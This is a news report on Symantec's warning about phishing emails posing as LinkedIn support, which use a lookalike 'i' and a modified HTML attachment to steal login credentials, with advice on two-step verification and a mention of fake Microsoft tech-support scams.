Cybercriminals are now targeting LinkedIn users by scamming them into sharing their credentials by sending out mails claiming to be from the support team of the professional networking site, according to security software firm Symantec.
Founded in 2003, LinkedIn has over 300 million members globally and nearly 26 million in India. Security firm Symantec says that it has observed an increase in phishing emails claiming to be from the US-based firm's support team over the last week. Hackers have been sending an email with a lowercase 'i' to spell LinkedIn, instead of capital 'I', which may not be noticeable by a normal user.
"The body of the email claims that irregular activities have prompted a 'compulsory security update' for the recipients' LinkedIn account," Symantec said. "However, the website's source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker," Symantec warned.
"The difference in characters is indiscernible to the eye and functions as a way to evade mail filters. Also, the HTML attachment method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished," Symantec said.
Symantec has asked LinkedIn users to use two-step verification as this will prevent an attacker from accessing the account even if a user's credentials are compromised. Users should never click on links or download attachments from suspicious or unknown accounts and they should contact LinkedIn immediately if they are attacked.
Recently Microsoft users also faced similar issues, where they were getting fraudulent calls from hackers pretending that they were from the company's tech support team. The hackers asked the users to download a program which was then used by the criminals to gain financial data or even use remote access to gain ransom. Microsoft has filed a legal suit against an Indian company as well as several others for the fraudulent activities.